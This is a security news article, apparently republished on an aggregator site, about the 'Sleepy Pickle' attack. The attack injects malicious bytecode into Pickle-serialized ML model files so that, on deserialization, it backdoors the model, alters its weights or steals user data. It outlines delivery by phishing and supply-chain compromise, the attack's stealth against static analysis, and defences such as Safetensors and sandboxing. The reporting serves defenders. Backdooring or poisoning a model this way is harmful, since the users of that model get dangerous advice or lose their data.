Sleepy Pickle Exploit Subtly Poisons ML Models

A model can be perfectly innocent, yet still dangerous if the means by which its packed and unpacked are tainted.

Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the process of serialization.
The method focuses on
the pickling process
used to store Python objects in bytecode. ML models are often packaged and distributed in Pickle format, despite its
longstanding, known risks
.
As described in
a new blog post
from Trail of Bits, Pickle files allow some cover for attackers to inject malicious bytecode into ML programs. In theory, such code could cause any number of consequences — manipulated output, data theft, etc. — but wouldnt be as easily detected as other methods of supply chain attack.
It allows us to more subtly embed malicious behavior into our applications at runtime, which allows us to potentially go much longer periods of time without it being noticed by our incident response team, warns David Brauchler, principal security consultant with NCC Group.
A so-called Sleepy Pickle attack is performed rather simply with
a tool like Flicking
. Flicking is an open source program for detecting, analyzing, reverse engineering, or
creating malicious Pickle files
. An attacker merely has to convince a target to download a poisoned .pkl — say via phishing or supply chain compromise — and then, upon deserialization, their malicious operation code executes as a Python payload.
Poisoning a model in this way carries a number of advantages to stealth. For one thing, it doesnt require local or remote access to a targets system, and no trace of malware is left to the disk. Because the poisoning occurs dynamically during deserialization, it resists static analysis. (A malicious model published to an
AI repository like Hugging Face
might be much more easily snuffed out.)
Serialized model files are hefty, so the malicious code necessary to cause damage might only represent a small fraction of the total file size. And these attacks can be customized in any number of ways that regular malware attacks are to prevent detection and analysis.
While Sleepy Pickle can presumably be used to do any number of things to a targets machine, the researchers noted, controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data.
More interestingly, attacks can be oriented to manipulate the model itself. For example, an attacker could insert a backdoor into the model, or manipulate its weights and, thereby, its outputs. Trail of Bits demonstrated in practice how this method can be used to, for example, suggest that users with the flu drink bleach to cure themselves. Alternatively, an infected model can be used to
steal sensitive user data
, add phishing links or malware to model outputs, and more.
To avoid this kind of risk, organizations can focus on only using ML models in the safer file format, Safetensors. Unlike Pickle, Safetensors deals only with tensor data, not Python objects, removing the risk of arbitrary code execution deserialization.
If your organization is dead set on running models that are out there that have been distributed as a pickled version, one thing that you could do is upload it into a resource safe sandbox — say, AWS Lambda — and do a conversion on the fly, and have that produce a Safetensors version of the file on your behalf, Brauchler suggests.
But, he adds, I think thats more of a Band-Aid on top of a larger problem. Sure, if you go and download a Safetensors file, you might have some amount of confidence that that doesnt contain malicious code. But do you trust that the individual or organization that produced this data generated a machine learning model that doesnt contain things like backdoors or malicious behavior, or any other number of issues, oversights, or malice, that your organization isnt prepared to handle?
I think that we really need to be paying attention to how were managing trust within our systems, he says, and the best way of doing that is to strictly separate the data a model is retrieving from the code it uses to function. We need to be architecting around these models such that even if they do misbehave, the users of our application and our assets within our environments are not impacted.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Sleepy Pickle Exploit Subtly Poisons ML Models